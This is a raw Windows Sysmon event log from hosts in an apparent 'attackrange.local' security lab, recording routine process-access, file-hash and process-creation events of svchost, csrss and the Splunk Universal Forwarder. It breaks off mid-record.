07:52:35.820{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081759Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:35.820{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081758Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:35.820{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081757Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:35.820{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081756Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:35.820{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081755Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:35.820{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081754Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:35.820{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081753Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:35.820{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081752Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:35.820{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081751Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:35.820{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B2C3-615A-5401-00000000FD01}1660C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081750Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:35.820{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B2C3-615A-5401-00000000FD01}1660C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081749Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:35.821{2FDD8D40-B2C3-615A-5401-00000000FD01}1660C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081748Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:35.804{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7DCC53573ADF7FD7C4AFCE589A4E7C9C,SHA256=A27508BE9B1B35111D793F839226183C64D8D7FA5470B967A1F6B460FF65C86C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081747Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:35.367{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=422F60A6CCBFA3399DC113487EBB3DDF,SHA256=6F22E50CC7D9B2740E1FF26FC0C2F587BD6D47849EB37BC9F4F8C0FFBAB9F34D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103871Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:36.451{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0334425E27A407ED75C76FAC48A7AD39,SHA256=46EB122898776D35B86992431F19E76D79D9AAE417F20ACF0DE327544B8781DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081778Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:36.903{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E80471D5BC9375BBB93C3585135C1123,SHA256=EBACDCA4851AE1F2E99B4CA4EE6EADA0BC0E709737F320C65734B89002C9F05E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081777Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:36.653{2FDD8D40-B2C4-615A-5501-00000000FD01}27362732C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081776Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:36.465{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B2C4-615A-5501-00000000FD01}2736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081775Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:36.465{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081774Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:36.465{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081773Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:36.465{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081772Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:36.465{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081771Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:36.465{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081770Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:36.465{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081769Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:36.465{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081768Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:36.465{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081767Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:36.465{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081766Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:36.465{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B2C4-615A-5501-00000000FD01}2736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081765Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:36.465{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B2C4-615A-5501-00000000FD01}2736C:\Program 